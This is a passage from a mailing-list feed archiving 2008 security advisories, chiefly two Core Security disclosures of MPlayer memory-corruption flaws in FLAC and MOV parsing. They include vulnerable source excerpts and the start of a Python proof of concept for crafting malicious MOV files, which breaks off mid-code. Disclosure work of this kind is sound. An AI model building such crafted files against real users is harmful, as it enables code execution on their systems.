&lt;br&gt;&lt;a href=&quot;http://labs.idefense.com/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://labs.idefense.com/&lt;/a&gt;&lt;br&gt;&lt;br&gt;X. LEGAL NOTICES
&lt;br&gt;&lt;br&gt;Copyright © 2008 iDefense, Inc.
&lt;br&gt;&lt;br&gt;Permission is granted for the redistribution of this alert
&lt;br&gt;electronically. It may not be edited in any way without the express
&lt;br&gt;written consent of iDefense. If you wish to reprint the whole or any
&lt;br&gt;part of this alert in any other medium other than electronically,
&lt;br&gt;please e-mail &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=15279231&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;customerservice@...&lt;/a&gt; for permission.
&lt;br&gt;&lt;br&gt;Disclaimer: The information in the advisory is believed to be accurate
&lt;br&gt;at the time of publishing based on currently available information. Use
&lt;br&gt;of the information constitutes acceptance for use in an AS IS condition.
&lt;br&gt;&amp;nbsp;There are no warranties with regard to this information. Neither the
&lt;br&gt;author nor the publisher accepts any liability for any direct,
&lt;br&gt;indirect, or consequential loss or damage arising from use of, or
&lt;br&gt;reliance on, this information.
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/iDefense-Security-Advisory-01.31.08%3A-IBM-Informix-Dynamic-Server-SQLIDEBUG-File-Creation-Vulnerability-tp15279231p15279231.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-15278177</id>
	<title>CORE-2007-1218: MPlayer 1.0rc2 buffer overflow vulnerability</title>
	<published>2008-02-04T11:43:30Z</published>
	<updated>2008-02-04T11:43:30Z</updated>
	<author>
		<name>Core Security Technologies Advisories</name>
	</author>
	<content type="html">-----BEGIN PGP SIGNED MESSAGE-----
&lt;br&gt;Hash: SHA1
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; Core Security Technologies - CoreLabs Advisory
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;a href=&quot;http://www.coresecurity.com/corelabs&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.coresecurity.com/corelabs&lt;/a&gt;&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;MPlayer 1.0rc2 buffer overflow vulnerability
&lt;br&gt;&lt;br&gt;&lt;br&gt;*Advisory Information*
&lt;br&gt;&lt;br&gt;Title: MPlayer 1.0rc2 buffer overflow vulnerability
&lt;br&gt;Advisory ID: CORE-2007-1218
&lt;br&gt;Advisory URL: &lt;a href=&quot;http://www.coresecurity.com/?action=item&amp;id=2103&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.coresecurity.com/?action=item&amp;id=2103&lt;/a&gt;&lt;br&gt;Date published: 2008-02-04
&lt;br&gt;Date of last update: 2008-02-01
&lt;br&gt;Vendors contacted: MPlayer and Xine team
&lt;br&gt;Release mode: Coordinated release
&lt;br&gt;&lt;br&gt;&lt;br&gt;*Vulnerability Information*
&lt;br&gt;&lt;br&gt;Class: Buffer overflow
&lt;br&gt;Remotely Exploitable: No
&lt;br&gt;Locally Exploitable: Yes
&lt;br&gt;Bugtraq ID: 27441
&lt;br&gt;CVE Name: CVE-2008-0486
&lt;br&gt;&lt;br&gt;&lt;br&gt;*Vulnerability Description*
&lt;br&gt;&lt;br&gt;The MPlayer package [1] is vulnerable to a buffer overflow attack, which
&lt;br&gt;can be exploited by malicious remote attackers. The vulnerability is due
&lt;br&gt;to MPlayer not properly sanitizing certain tags on a FLAC file before
&lt;br&gt;using them to index an array on the stack. This can be exploited to
&lt;br&gt;execute arbitrary commands by opening a specially crafted file.
&lt;br&gt;&lt;br&gt;The Xine package [2], and probably other packages based on MPlayer [3],
&lt;br&gt;are vulnerable to this attack too.
&lt;br&gt;&lt;br&gt;&lt;br&gt;*Vulnerable Packages*
&lt;br&gt;&lt;br&gt;. MPlayer 1.0rc2 and SVN before r25917 (Tue Jan 29 22:00:58 2008 UTC).
&lt;br&gt;Older versions are probably affected too, but they were not checked.
&lt;br&gt;. Xine-lib 1.1.10. Other MPlayer related projects are affected too.
&lt;br&gt;&lt;br&gt;&lt;br&gt;*Non-vulnerable Packages*
&lt;br&gt;&lt;br&gt;. MPlayer SVN HEAD after r25917.
&lt;br&gt;. MPlayer 1.0rc2 + security patches.
&lt;br&gt;&lt;br&gt;&lt;br&gt;*Vendor Information, Solutions and Workarounds*
&lt;br&gt;&lt;br&gt;A fix for this problem was committed to SVN on the MPlayer project [4].
&lt;br&gt;Users of affected MPlayer versions should download a patch [5] for
&lt;br&gt;MPlayer 1.0rc2 or update to the latest version if they are using SVN.
&lt;br&gt;&lt;br&gt;&lt;br&gt;*Credits*
&lt;br&gt;&lt;br&gt;This vulnerability was discovered by Damian Frizza and Alfredo Ortega,
&lt;br&gt;from the Exploit Writers team of Core Security Technologies.
&lt;br&gt;&lt;br&gt;&lt;br&gt;*Technical Description / Proof of Concept Code*
&lt;br&gt;&lt;br&gt;The vulnerability was found in the following code, used to parse FLAC
&lt;br&gt;comments inside MPlayer:
&lt;br&gt;&lt;br&gt;/-----------
&lt;br&gt;&lt;br&gt;libmpdemux/demux_audio.c
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; 
&lt;br&gt;206 case FLAC_VORBIS_COMMENT:
&lt;br&gt;207 &amp;nbsp; &amp;nbsp; {
&lt;br&gt;208 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;/* For a description of the format please have a look at */
&lt;br&gt;209 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;/* &lt;a href=&quot;http://www.xiph.org/vorbis/doc/v-comment.html&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.xiph.org/vorbis/doc/v-comment.html&lt;/a&gt;&amp;nbsp;*/
&lt;br&gt;210
&lt;br&gt;211 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;uint32_t length, comment_list_len;
&lt;br&gt;212 (1) &amp;nbsp; &amp;nbsp;char comments[blk_len];
&lt;br&gt;213 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;uint8_t *ptr = comments;
&lt;br&gt;214 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;char *comment;
&lt;br&gt;215 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;int cn;
&lt;br&gt;216 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;char c;
&lt;br&gt;217
&lt;br&gt;218 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;if (stream_read (s, comments, blk_len) == blk_len)
&lt;br&gt;219 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;{
&lt;br&gt;220 (2) &amp;nbsp; &amp;nbsp; &amp;nbsp; length = AV_RL32(ptr);
&lt;br&gt;221 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;ptr += 4 + length;
&lt;br&gt;222
&lt;br&gt;223 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;comment_list_len = AV_RL32(ptr);
&lt;br&gt;224 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;ptr += 4;
&lt;br&gt;225
&lt;br&gt;226 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;cn = 0;
&lt;br&gt;227 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;for (; cn &amp;lt; comment_list_len; cn++)
&lt;br&gt;228 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;{
&lt;br&gt;229 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; length = AV_RL32(ptr);
&lt;br&gt;230 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; ptr += 4;
&lt;br&gt;231
&lt;br&gt;232 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; comment = ptr;
&lt;br&gt;233 (3) &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; c = comment[length];
&lt;br&gt;234 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; comment[length] = 0;						 &amp;nbsp; &amp;nbsp;...
&lt;br&gt;&lt;br&gt;- -----------/
&lt;br&gt;&lt;br&gt;We can see in (2) that the 'length' variable is being loaded from a
&lt;br&gt;position on the file stream, and then used without any validation to
&lt;br&gt;index the 'comment' buffer, that was allocated from the stack in (1).
&lt;br&gt;This causes a stack corruption, and possibly allows code execution (e.g.
&lt;br&gt;modifying the value of the 'length' variable, that is also on the stack).
&lt;br&gt;&lt;br&gt;Example Attack Scenario:
&lt;br&gt;&lt;br&gt;1) The user receives an email with an attachment called e.g.
&lt;br&gt;'goodmusic.flac'.
&lt;br&gt;2) The user opens the file with MPlayer or another vulnerable software.
&lt;br&gt;3) This causes a stack corruption and malicious code execution on the
&lt;br&gt;user computer.
&lt;br&gt;&lt;br&gt;&lt;br&gt;*Report Timeline*
&lt;br&gt;&lt;br&gt;. 2007-12-18: Core Security Technologies notifies the MPlayer team of
&lt;br&gt;the vulnerability (no reply received).
&lt;br&gt;. 2008-01-04: A new notification of the vulnerability was sent to the
&lt;br&gt;MPlayer team (no reply received).
&lt;br&gt;. 2008-01-18: A new notification of the vulnerability was sent to the
&lt;br&gt;MPlayer team.
&lt;br&gt;. 2008-01-18: The MPlayer team asked Core Security Technologies for
&lt;br&gt;technical description of the vulnerability.
&lt;br&gt;. 2008-01-22: Technical details was sent to MPlayer team by Core
&lt;br&gt;Security Technologies.
&lt;br&gt;. 2008-01-28: MPlayer notified Core Security Technologies that a fix had
&lt;br&gt;been produced.
&lt;br&gt;. 2008-02-04: CORE-2007-1218 advisory was published.
&lt;br&gt;&lt;br&gt;&lt;br&gt;*References*
&lt;br&gt;&lt;br&gt;[1] &lt;a href=&quot;http://www.mplayerhq.hu&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.mplayerhq.hu&lt;/a&gt;&lt;br&gt;[2] &lt;a href=&quot;http://xinehq.de/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://xinehq.de/&lt;/a&gt;&lt;br&gt;[3] &lt;a href=&quot;http://www.mplayerhq.hu/design7/projects.html&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.mplayerhq.hu/design7/projects.html&lt;/a&gt;&lt;br&gt;[4]
&lt;br&gt;&lt;a href=&quot;http://svn.mplayerhq.hu/mplayer/trunk/libmpdemux/demux_audio.c?r1=25911&amp;r2=25917&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://svn.mplayerhq.hu/mplayer/trunk/libmpdemux/demux_audio.c?r1=25911&amp;r2=25917&lt;/a&gt;&lt;br&gt;[5] &lt;a href=&quot;http://www.mplayerhq.hu/MPlayer/patches/demux_audio_fix_20080129.diff&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.mplayerhq.hu/MPlayer/patches/demux_audio_fix_20080129.diff&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;*About CoreLabs*
&lt;br&gt;&lt;br&gt;CoreLabs, the research center of Core Security Technologies, is charged
&lt;br&gt;with anticipating the future needs and requirements for information
&lt;br&gt;security technologies. We conduct our research in several important
&lt;br&gt;areas of computer security including system vulnerabilities, cyber
&lt;br&gt;attack planning and simulation, source code auditing, and cryptography.
&lt;br&gt;Our results include problem formalization, identification of
&lt;br&gt;vulnerabilities, novel solutions and prototypes for new technologies.
&lt;br&gt;CoreLabs regularly publishes security advisories, technical papers,
&lt;br&gt;project information and shared software tools for public use at:
&lt;br&gt;&lt;a href=&quot;http://www.coresecurity.com/corelabs/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.coresecurity.com/corelabs/&lt;/a&gt;.
&lt;br&gt;&lt;br&gt;&lt;br&gt;*About Core Security Technologies*
&lt;br&gt;&lt;br&gt;Core Security Technologies develops strategic solutions that help
&lt;br&gt;security-conscious organizations worldwide develop and maintain a
&lt;br&gt;proactive process for securing their networks. The company's flagship
&lt;br&gt;product, CORE IMPACT, is the most comprehensive product for performing
&lt;br&gt;enterprise security assurance testing. CORE IMPACT evaluates network,
&lt;br&gt;endpoint and end-user vulnerabilities and identifies what resources are
&lt;br&gt;exposed. It enables organizations to determine if current security
&lt;br&gt;investments are detecting and preventing attacks. Core Security
&lt;br&gt;Technologies augments its leading technology solution with world-class
&lt;br&gt;security consulting services, including penetration testing and software
&lt;br&gt;security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
&lt;br&gt;Security Technologies can be reached at 617-399-6980 or on the Web at
&lt;br&gt;&lt;a href=&quot;http://www.coresecurity.com&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.coresecurity.com&lt;/a&gt;.
&lt;br&gt;&lt;br&gt;&lt;br&gt;*Disclaimer*
&lt;br&gt;&lt;br&gt;The contents of this advisory are copyright (c) 2008 Core Security
&lt;br&gt;Technologies and (c) 2008 CoreLabs, and may be distributed freely
&lt;br&gt;provided that no fee is charged for this distribution and proper credit
&lt;br&gt;is given.
&lt;br&gt;&lt;br&gt;&lt;br&gt;*GPG/PGP Keys*
&lt;br&gt;&lt;br&gt;This advisory has been signed with the GPG key of Core Security
&lt;br&gt;Technologies advisories team, which is available for download at
&lt;br&gt;&lt;a href=&quot;http://www.coresecurity.com/files/attachments/core_security_advisories.asc&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.coresecurity.com/files/attachments/core_security_advisories.asc&lt;/a&gt;.
&lt;br&gt;&lt;br&gt;-----BEGIN PGP SIGNATURE-----
&lt;br&gt;Version: GnuPG v1.4.7 (MingW32)
&lt;br&gt;Comment: Using GnuPG with Mozilla - &lt;a href=&quot;http://enigmail.mozdev.org&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://enigmail.mozdev.org&lt;/a&gt;&lt;br&gt;&lt;br&gt;iD8DBQFHp2riyNibggitWa0RApD/AKCtN46G9t/7fMEutRQbUx6uVKonDwCfWYcb
&lt;br&gt;g+kdvVlvzynfGW8XUUI1v7w=
&lt;br&gt;=Byqy
&lt;br&gt;-----END PGP SIGNATURE-----
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/CORE-2007-1218%3A-MPlayer-1.0rc2-buffer-overflow-vulnerability-tp15278177p15278177.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-15277244</id>
	<title>CORE-2008-0122: MPlayer arbitrary pointer dereference</title>
	<published>2008-02-04T11:27:16Z</published>
	<updated>2008-02-04T11:27:16Z</updated>
	<author>
		<name>Core Security Technologies Advisories</name>
	</author>
	<content type="html">-----BEGIN PGP SIGNED MESSAGE-----
&lt;br&gt;Hash: SHA1
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Core Security Technologies - CoreLabs Advisory
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;a href=&quot;http://www.coresecurity.com/corelabs&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.coresecurity.com/corelabs&lt;/a&gt;&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; MPlayer arbitrary pointer dereference
&lt;br&gt;&lt;br&gt;*Advisory Information*
&lt;br&gt;&lt;br&gt;Title: MPlayer arbitrary pointer dereference
&lt;br&gt;Advisory ID: CORE-2008-0122
&lt;br&gt;Advisory URL: &lt;a href=&quot;http://www.coresecurity.com/?action=item&amp;id=2102&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.coresecurity.com/?action=item&amp;id=2102&lt;/a&gt;&lt;br&gt;Date published: 2008-02-04
&lt;br&gt;Date of last update: 2008-01-30
&lt;br&gt;Vendors contacted: MPlayer team
&lt;br&gt;Release mode: Coordinated release
&lt;br&gt;&lt;br&gt;&lt;br&gt;*Vulnerability Information*
&lt;br&gt;&lt;br&gt;Class: Buffer overflow
&lt;br&gt;Remotely Exploitable: Yes
&lt;br&gt;Locally Exploitable: No
&lt;br&gt;Bugtraq ID: 27499
&lt;br&gt;CVE Name: CVE-2008-0485
&lt;br&gt;&lt;br&gt;&lt;br&gt;*Vulnerability Description*
&lt;br&gt;&lt;br&gt;The MPlayer package [1] is vulnerable to an arbitrary pointer
&lt;br&gt;dereference vulnerability, which can be exploited by malicious remote
&lt;br&gt;attackers to compromise a user's system. The vulnerability is caused by
&lt;br&gt;the MPlayer libmpdemux ('demux_mov.c') library not properly sanitizing
&lt;br&gt;certain tags on a MOV file before using them to index an array on the
&lt;br&gt;heap. This can be exploited to execute arbitrary commands by opening a
&lt;br&gt;specially crafted file.
&lt;br&gt;&lt;br&gt;&lt;br&gt;*Vulnerable Packages*
&lt;br&gt;&lt;br&gt;. MPlayer 1.0 rc2.
&lt;br&gt;. Older versions are probably affected too, but they were not checked.
&lt;br&gt;&lt;br&gt;&lt;br&gt;*Non-vulnerable Packages*
&lt;br&gt;&lt;br&gt;. MPlayer SVN HEAD after r25922 (Tue Jan 29 22:14:00 2008 UTC).
&lt;br&gt;. MPlayer 1.0rc2 + security patches.
&lt;br&gt;&lt;br&gt;&lt;br&gt;*Vendor Information, Solutions and Workarounds*
&lt;br&gt;&lt;br&gt;A fix for this problem was committed to SVN on the MPlayer project [2].
&lt;br&gt;Users of affected MPlayer versions should download a patch [3] for
&lt;br&gt;MPlayer 1.0rc2 or update to the latest version if they are using SVN.
&lt;br&gt;&lt;br&gt;&lt;br&gt;*Credits*
&lt;br&gt;&lt;br&gt;This vulnerability was discovered and researched by Felipe Manzano and
&lt;br&gt;Anibal Sacco from Core Security Technologies.
&lt;br&gt;&lt;br&gt;&lt;br&gt;*Technical Description / Proof of Concept Code*
&lt;br&gt;&lt;br&gt;First some information from Quicktime File Format Specification (may 1996):
&lt;br&gt;&lt;br&gt;&amp;quot;A QuickTime file stores the description of the media separately from
&lt;br&gt;the media data. The description, or meta-data, is called the movie and
&lt;br&gt;contains information such as the number of tracks, video compression
&lt;br&gt;format, and timing information. The movie also contains an index of
&lt;br&gt;where all the media data is stored. The media data is all of the actual
&lt;br&gt;sample data, such as video frames and audio samples. The media data may
&lt;br&gt;be stored in the same file as the QuickTime movie, in a separate file,
&lt;br&gt;or in several files.
&lt;br&gt;&lt;br&gt;...QuickTime uses two basic structures for storing information: atoms
&lt;br&gt;and QT atoms. Both atoms and QT atoms allow you to construct arbitrarily
&lt;br&gt;complex hierarchical data structures. Both also allow applications to
&lt;br&gt;ignore data they don't understand.&amp;quot;
&lt;br&gt;&lt;br&gt;An atom field has a LTV format (Length - Tag - Value) and the sizes are
&lt;br&gt;the following:
&lt;br&gt;&lt;br&gt;/-----------
&lt;br&gt;&lt;br&gt;+--------------+
&lt;br&gt;| &amp;nbsp; &amp;nbsp; Size &amp;nbsp; &amp;nbsp; | &amp;nbsp; (32 bits)
&lt;br&gt;+--------------+
&lt;br&gt;| &amp;nbsp; &amp;nbsp; Tag &amp;nbsp; &amp;nbsp; &amp;nbsp;| &amp;nbsp; (32 bits)
&lt;br&gt;+--------------+
&lt;br&gt;| &amp;nbsp; Payload &amp;nbsp; &amp;nbsp;| &amp;nbsp; (variable, which could contain other atoms inside)
&lt;br&gt;+--------------+
&lt;br&gt;&lt;br&gt;- -----------/
&lt;br&gt;&lt;br&gt;The MPlayer software walks these atoms structures and parses the
&lt;br&gt;'Payload' fields. The vulnerability occurs when parsing the 'stsc' atom
&lt;br&gt;tag (which could be contained or not inside another atom) as we explain
&lt;br&gt;below.
&lt;br&gt;&lt;br&gt;At 'mov_demux.c' (line 1768) an array of 'chunkmap' structures is filled
&lt;br&gt;by reading data straight from file without any kind of check. Then, at
&lt;br&gt;'mov_build_index()' (line 150), the 'trak-&amp;gt;chunkmap[i].first' field is
&lt;br&gt;used to index the heap array 'chunks' allowing an attacker to write the
&lt;br&gt;'sdid' and 'spc' values at some memory address relative to that heap
&lt;br&gt;pointer causing a memory corruption. This could be used to overwrite
&lt;br&gt;function pointers or some critical data allowing an attacker to get code
&lt;br&gt;execution.
&lt;br&gt;&lt;br&gt;Besides, it is possible to fool the parser in a way such that no memory
&lt;br&gt;is allocated for the array pointed by 'trak-&amp;gt;chunks', being initialized
&lt;br&gt;to 0 (at line 1301). Doing this will remove the &amp;quot;relative to that heap
&lt;br&gt;pointer&amp;quot; restriction allowing an attacker to write partially at almost
&lt;br&gt;any memory address.
&lt;br&gt;&lt;br&gt;Why partially? Because the structure used to write is declared in this way:
&lt;br&gt;&lt;br&gt;/-----------
&lt;br&gt;&lt;br&gt;typedef struct {
&lt;br&gt;&amp;nbsp; &amp;nbsp; unsigned int sample; // number of the first sample in the chunk
&lt;br&gt;&amp;nbsp; &amp;nbsp; unsigned int size; &amp;nbsp; // number of samples in the chunk
&lt;br&gt;&amp;nbsp; &amp;nbsp; int desc; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;// for multiple codecs mode - not used
&lt;br&gt;&amp;nbsp; &amp;nbsp; off_t pos;
&lt;br&gt;} mov_chunk_t;
&lt;br&gt;&lt;br&gt;- -----------/
&lt;br&gt;&lt;br&gt;So, being 'desc' and 'size' the controlled fields it is possible to
&lt;br&gt;write at memory address: 'i*sizeof(chunk_t)+4' and 'i*sizeof(chunk_t)+8'
&lt;br&gt;for any 'i' value (at lines 177 and 178).
&lt;br&gt;&lt;br&gt;/-----------
&lt;br&gt;&lt;br&gt;1755 &amp;nbsp;case MOV_FOURCC('s','t','s','c'): {
&lt;br&gt;1756 &amp;nbsp; &amp;nbsp;int temp = stream_read_dword(demuxer-&amp;gt;stream);
&lt;br&gt;1757 &amp;nbsp; &amp;nbsp;int len = stream_read_dword(demuxer-&amp;gt;stream);
&lt;br&gt;1758 &amp;nbsp; &amp;nbsp;int ver = (temp &amp;lt;&amp;lt; 24);
&lt;br&gt;1759 &amp;nbsp; &amp;nbsp;int flags = (temp &amp;lt;&amp;lt; 16) | (temp &amp;lt;&amp;lt; 8) | temp;
&lt;br&gt;1760 &amp;nbsp; &amp;nbsp;int i;
&lt;br&gt;1761 &amp;nbsp; &amp;nbsp;mp_msg(MSGT_DEMUX, MSGL_V,
&lt;br&gt;1762 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;quot;MOV: %*sSample-&amp;gt;Chunk mapping table! &amp;nbsp;(%d blocks)
&lt;br&gt;(ver:%d,flags:%d)\n&amp;quot;, level, &amp;quot;&amp;quot;,
&lt;br&gt;1763 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;len, ver, flags);
&lt;br&gt;1764 &amp;nbsp;// read data:
&lt;br&gt;1765 &amp;nbsp;trak-&amp;gt;chunkmap_size = len;
&lt;br&gt;1766 &amp;nbsp;trak-&amp;gt;chunkmap = calloc(len, sizeof(mov_chunkmap_t));
&lt;br&gt;1767 &amp;nbsp;for (i = 0; i &amp;lt; len; i++) {
&lt;br&gt;1768 &amp;nbsp; &amp;nbsp;trak-&amp;gt;chunkmap[i].first = stream_read_dword(demuxer-&amp;gt;stream) - 1;
&lt;br&gt;1769 &amp;nbsp; &amp;nbsp;trak-&amp;gt;chunkmap[i].spc = stream_read_dword(demuxer-&amp;gt;stream);
&lt;br&gt;1770 &amp;nbsp; &amp;nbsp;trak-&amp;gt;chunkmap[i].sdid = stream_read_dword(demuxer-&amp;gt;stream);
&lt;br&gt;1771 &amp;nbsp;}
&lt;br&gt;1772 &amp;nbsp;break;
&lt;br&gt;1773 }
&lt;br&gt;&lt;br&gt;150 void mov_build_index(mov_track_t* trak,int timescale){
&lt;br&gt;151 &amp;nbsp; &amp;nbsp; int i,j,s;
&lt;br&gt;152 &amp;nbsp; &amp;nbsp; int last=trak-&amp;gt;chunks_size;
&lt;br&gt;153 &amp;nbsp; &amp;nbsp; unsigned int pts=0;
&lt;br&gt;154
&lt;br&gt;169 &amp;nbsp; &amp;nbsp; mp_msg(MSGT_DEMUX, MSGL_V, &amp;quot;MOV track #%d: %d chunks, %d
&lt;br&gt;samples\n&amp;quot;,trak-&amp;gt;id,trak-&amp;gt;chunks_size,trak-&amp;gt;samples_size);
&lt;br&gt;170 &amp;nbsp; &amp;nbsp; mp_msg(MSGT_DEMUX, MSGL_V, &amp;quot;pts=%d &amp;nbsp;scale=%d
&lt;br&gt;time=%5.3f\n&amp;quot;,trak-&amp;gt;length,trak-&amp;gt;timescale,(float)trak-&amp;gt;length/(float)trak-&amp;gt;timescale);
&lt;br&gt;171
&lt;br&gt;172 &amp;nbsp; &amp;nbsp;// process chunkmap:
&lt;br&gt;173 &amp;nbsp; &amp;nbsp;i=trak-&amp;gt;chunkmap_size;
&lt;br&gt;174 &amp;nbsp; &amp;nbsp;while(i&amp;gt;0){
&lt;br&gt;175 &amp;nbsp; &amp;nbsp; &amp;nbsp; --i;
&lt;br&gt;176 &amp;nbsp; &amp;nbsp; &amp;nbsp; for(j=trak-&amp;gt;chunkmap[i].first;j&amp;lt;last;j++){
&lt;br&gt;177 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;trak-&amp;gt;chunks[j].desc=trak-&amp;gt;chunkmap[i].sdid;
&lt;br&gt;178 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;trak-&amp;gt;chunks[j].size=trak-&amp;gt;chunkmap[i].spc;
&lt;br&gt;179 &amp;nbsp; &amp;nbsp; &amp;nbsp; }
&lt;br&gt;180 &amp;nbsp; &amp;nbsp; &amp;nbsp; last=trak-&amp;gt;chunkmap[i].first;
&lt;br&gt;181 &amp;nbsp; &amp;nbsp;}
&lt;br&gt;&lt;br&gt;- -----------/
&lt;br&gt;&lt;br&gt;In this way, as we show in the following PoC, it is possible to build a
&lt;br&gt;file that contains specially crafted 'stsc' atoms allowing an attacker
&lt;br&gt;to write any value in practically any address. With this clear and some
&lt;br&gt;voodoo magic it is possible to write a scattered payload that builds a
&lt;br&gt;fully functional shellcode on some other place to subsequently jump to.
&lt;br&gt;&lt;br&gt;The following PoC python code demonstrates the vulnerability.
&lt;br&gt;&lt;br&gt;/-----------
&lt;br&gt;&lt;br&gt;#!/bin/python
&lt;br&gt;&lt;br&gt;import struct
&lt;br&gt;import sys
&lt;br&gt;&lt;br&gt;def mkatom(type,data):
&lt;br&gt;&amp;nbsp; &amp;nbsp; if len(type) != 4:
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; raise &amp;quot;type must by of length 4!!!&amp;quot;
&lt;br&gt;&amp;nbsp; &amp;nbsp; mov = &amp;quot;&amp;quot;
&lt;br&gt;&amp;nbsp; &amp;nbsp; mov += struct.pack(&amp;quot;&amp;gt;L&amp;quot;,len(data)+8)
&lt;br&gt;&amp;nbsp; &amp;nbsp; mov += type
&lt;br&gt;&amp;nbsp; &amp;nbsp; mov += data
&lt;br&gt;&amp;nbsp; &amp;nbsp; return mov
&lt;br&gt;&lt;br&gt;def poc(address, block_size):
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; what=struct.pack(&amp;quot;&amp;gt;L&amp;quot;, 0x41414141) * 2 # Writes an 8 bytes chunk
&lt;br&gt;&amp;nbsp; &amp;nbsp; base= ((address - 8) / block_size) +1
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; ftyp = mkatom(&amp;quot;ftyp&amp;quot;,&amp;quot;3gp4&amp;quot;+&amp;quot;\x00\x00\x02\x00&amp;quot;+&amp;quot;3gp4&amp;quot;+&amp;quot;3gp33gp23gp1&amp;quot;)
&lt;br&gt;&amp;nbsp; &amp;nbsp; mdat = mkatom(&amp;quot;mdat&amp;quot;,&amp;quot;MALDAAAAAD!&amp;quot;)
&lt;br&gt;&amp;nbsp; &amp;nbsp; stsc &amp;nbsp;= mkatom(&amp;quot;stsc&amp;quot;,struct.pack(&amp;quot;&amp;gt;L&amp;quot;,1) + \
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; struct.pack(&amp;quot;&amp;gt;L&amp;quot;,2) + \
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; struct.pack(&amp;quot;&amp;gt;L&amp;quot;,base) + \
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; what + \
